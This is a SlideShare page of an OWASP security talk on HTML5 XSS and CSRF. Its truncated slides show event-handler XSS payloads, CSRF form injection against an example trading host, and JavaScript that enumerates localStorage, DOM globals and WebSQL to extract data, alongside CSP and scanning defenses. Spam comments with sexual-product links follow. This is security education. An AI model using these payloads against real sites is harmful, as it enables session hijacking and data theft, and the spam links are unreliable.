Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
XSS & CSRF with HTML5              Attack, Exploit and Defense                            Shreeraj Shah                   ...
http://shreeraj.blogspot.com                                                              http://shreeraj.blogspot.com    ...
HTML5 VECTORS – ATTACKSURFACE                         OWASP              3
HTML5 – Attacks on the rise …Evolution of HTML5   1991 – HTML started (plain and simple)   1996 – CSS & JavaScript (Welc...
Modern Browser Model                                                                                       Mobile        H...
HTML5 Architecture & Threat Model                                   User Interface                                        ...
CSRF WITH HTML5                  OWASP             7
CSRF Attack Vector                                            ge                    Attacker’s                            ...
SOP bypass and Cookie Replay – Basic Type      GET Request       IMG SRC      <img src="http://host/?command">      SCRIPT...
Streams – name/value pairs are gone …                                        JSON                  XML                    ...
CSRF injection – splitting and forcing …<html><body><FORM NAME="buy" ENCTYPE="text/plain"action="http://trade.example.com/...
CSRF with XHR and CORS bypass                                                                                     Mobile  ...
XHR – Level 2 powering CSRFXHR object of HTML5 is very powerful   Allows interesting features like cross origin request ...
CORS & XHR – ingredients for CSRFBefore HTML5 – Cross Domain was not possible through XHR (SOP applicable)HTML5 – allows...
CORS based HTTP HeadersRequest  Origin  Access-Control-Request-Method (preflight)  Access-Control-Request-Headers (prefli...
XHR – Stealth POST/GETCSRF – powered by CORS and XHR  Hence, allow stealth channel and possible silent   exploitation  ...
Exploiting the use caseCORS preflight bypass – certain Content-Type bypass preflight HTTPForcing cookie replay by “withC...
CSRF with XHR/HTML5                                                                   Authentication                      ...
CSRF with XHR/HTML5                  Browser using                    XHR Call                                            ...
CSRF with XHR/HTML5                                            ge               Attacker’s                                ...
CSRF & HTML5                    OWASP               21
CSRF with XHR/HTML5                                            ge                      Attacker’s                         ...
CSRF & HTML5                    OWASP               23
CSRF with XHR/HTML5                   Browser is                  having Form                   (multi-part)              ...
CSRF/Upload - POC                         OWASP                    25
CSRF with XHR/HTML5                                            ge                      Attacker’s                         ...
CSRF/Upload                   OWASP              27
Internal Scan – not scan but crawl as well …                                                      Attacker’s              ...
Internal Scan for CORS                              OWASP                         29
Scan and DefendScan and look for  Content-Type checking on server side  CORS policy scan  Form and Upload with tokens ...
XSS WITH HTML5                  OWASP             31
XSS with HTML5 (tags, attributes and events)                                                                              ...
HTML5 – Tags/Attributes/EventsTags – media (audio/video), canvas (getImageData), menu, embed, buttons/commands, Form cont...
XSS variantsMedia tagsExamples   <video><source onerror="javascript:alert(1)“>   <video onerror="javascript:alert(1)">...
XSS variantsExploiting autofocus  <input autofocus onfocus=alert(1)>  <select autofocus onfocus=alert(1)>  <textarea a...
XSS variantsForm & Button etc.   <form id="test" /><button form="test"    formaction="javascript:alert(1)">test   <form...
Scan and DefendScan and look for  Reflected or Persistent XSS spots with HTML5 tagsDefense and Countermeasures  Have i...
CSP in Action – HTML5 defense …Content Security Policy – Defending browser against possible post attack scenarios   Base...
Blocking ScriptsContent-Security-Policy: script-src self‘   Only allowing script from the selfOther mechanism   unsafe...
Controlling Browserconnect-src – Controlling WebSocket, XHR etc.frame-src – Source of the frame (ClickJacking)object-sr...
Example Persistent XSS injectedHTTP/1.1 200 OKDate: Wed, 12 Sep 2012 14:40:31 GMTServer: Microsoft-IIS/6.0X-Powered-By: A...
Storage extraction with XSS                                                                                     Mobile    ...
Web Storage ExtractionBrowser has one place to store data – Cookie (limited and replayed)HTML5 – Storage API provided (L...
Web Storage ExtractionIt is possible to steal them through XSS or via JavaScriptSession hijacking – HttpOnly of no useg...
Blind storage enumerationif(localStorage.length){          console.log(localStorage.length)          for(i in localStorage...
File System StorageHTML5 provides virtual file system with filesystem APIs   window.requestFileSystem = window.requestFi...
File System StorageIt provides temporary or permanent file system   function init() {       window.requestFileSystem(wind...
Sensitive information filesystemAssuming app is creating profile on local system                                         ...
Extraction through XSSOnce have an entry point – game over!                                         OWASP                ...
Single DOM/One Page App - XSSApplications run with “rich” DOMJavaScript sets several variables and parameters while load...
Blind Enumerationfor(i in window){  obj=window[i];   try{        if(typeof(obj)=="string"){           console.log(i);     ...
Global Sensitive Information Extraction from DOMHTML5 apps running on Single DOMHaving several key global variables, obj...
Global Sensitive Information Extraction from DOMfor(i in window){  obj=window[i];  if(obj!=null||obj!=undefined)      var ...
Scan and DefendScan and look for  Scanning storageDefense and Countermeasures  Do not store sensitive information on l...
SQLi & Blind Enumeration through XSS                                                                                     M...
SQL InjectionWebSQL is part of HTML 5 specification, it provides SQL database to the browser itself.Allows one time data...
SQL InjectionThrough JavaScript one can harvest entire local database.Example                                           ...
Blind WebSQL Enumerationvar dbo;var table;var usertable;for(i in window){            obj = window[i];            try{     ...
Blind WebSQL EnumerationWe will run through all objects and get object where constructor is “Database”We will make Selec...
Blind WebSQL Enumeration                           OWASP                      60
Web Messaging and Worker Injection                                                                                     Mob...
Web Messaging HTML5 is having new interframe communication system  called Web Messaging. By postMessage() call parent fr...
Web Messaging - ScenarioIf postMessage() is set to * so page can be loaded in iframe and messaging can be hijackedAlso, ...
Origin check                    OWASP               64
Web Worker – Hacks!Web Workers allows threading into HTML pages using JavaScriptNo need to use JavaScript calls like set...
Web Worker – Hacks!                                                  Web Page                                             ...
Web Worker – Hacks!Security issues  It is not allowing to load cross domain worker scripts.   (http:, https:,javascript:...
Web Worker – Hacks! Exmaple<html><button onclick="Read()">Read Last Message</button><button onclick="stop()">Stop</button...
Web Workers – Hacks!Possible to cause XSS   Running script   Passing hidden payloadAlso, web workers can help in embed...
Scan and DefendScan and look for  JavaScript scanning  Messaging and Worker implementation  DOM calls  Use of eval(),...
APIs …HTML5 few other APIs are interesting from security standpoint   File APIs – allows local file access and can mixed...
Resources/Referenceshttp://www.html5rocks.com/en/ (Solid stuff)https://www.owasp.org/index.php/HTML5_Security _Cheat_She...
http://shreeraj.blogspot.com                  http://shreeraj.blogspot.com                   shreeraj@blueinfy.com        ...
Upcoming SlideShare
Loading in …5
×

XSS variantsExploiting autofocus <input autofocus XSS and CSRF with HTML5

39,719 views

Published on

XSS variantsExploiting autofocus <input autofocus onfocus=alert(1)> <select autofocus onfocus=alert(1)> <textarea autofocus onfocus=alert(1)> <keygen autofocus onfocus=alert(1)> OWASP 35

Published in: Technology
  • Unlock Her Legs is your passage way to a life full of loving and sex... read more ... ●●● http://t.cn/AijLRbnO
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • How to use "The Scrambler" ot get a girl obsessed with BANGING you... ➤➤ http://t.cn/AijLRbnO
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • How to use "The Scrambler" ot get a girl obsessed with BANGING you...  http://t.cn/AijLRbnO
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • HOW TO UNLOCK HER LEGS! (SNEAK PEAK), learn more...  http://t.cn/AiurDrZp
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • ➤➤ How Long Does She Want You to Last? Here's the link to the FREE report ♣♣♣ http://ishbv.com/rockhardx/pdf
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here

×